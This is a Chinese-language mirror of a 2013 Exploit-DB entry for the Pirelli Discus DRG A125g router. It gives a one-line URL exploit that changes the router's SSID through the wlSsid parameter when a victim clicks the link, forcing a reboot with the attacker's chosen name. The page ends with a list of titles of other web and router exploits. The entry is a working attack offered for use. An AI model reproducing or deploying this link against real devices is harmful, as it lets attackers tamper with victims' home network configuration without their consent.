Pirelli Discus DRG A125g – Remote Change SSID Value

Exploit Database
86 阅读

作者： Sebastián Magof

日期： 2013-11-24
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/29794/

# Exploit Title: Pirelli Discus DRG A125g remote change SSID value
vulnerability
# Hardware: Pirelli Discus DRG A125g
# Date: 2013/11/23
# Exploit Author: Sebastián Magof
# Tested on: Linux/Windows
# Twitter: @smagof
# Greetz: Family, friends && under guys.
# Special Greetz:
# (\/)
# (**) αlpha
#(")(")


#Exploit:

http://10.0.0.2/wlbasic.wl?wlSsidIdx=0&wlSsid=bysmagof

#info: where the parameter "wlSsid"is where the attacker will enter the
new SSID. If the victim clicks on the url your modem / router will reboot
automatically with the new SSID provided by the attacker.

last Exploits
Pirelli Discus DRG A125g – Remote Change SSID Value的更多信息

iScripts EasyCreate 3.2 – ‘siteid’ SQL Injection：
Claydip Airbnb Clone 1.0 – Arbitrary File Upload：
Bonefire 0.7.1 – Reinstall Admin Account：
D-Link Routers – Command Injection：
New STAR 2.1 – SQL Injection / Cross-Site Scripting：
Online Motorcycle (Bike) Rental System 1.0 – Blind Time-Based SQL Injection (Unauthenticated)：
PHP Designer 2007 Personal – Multiple SQL Injections：
WebsiteBaker 2.13.0 – Remote Code Execution (RCE) (Authenticated)：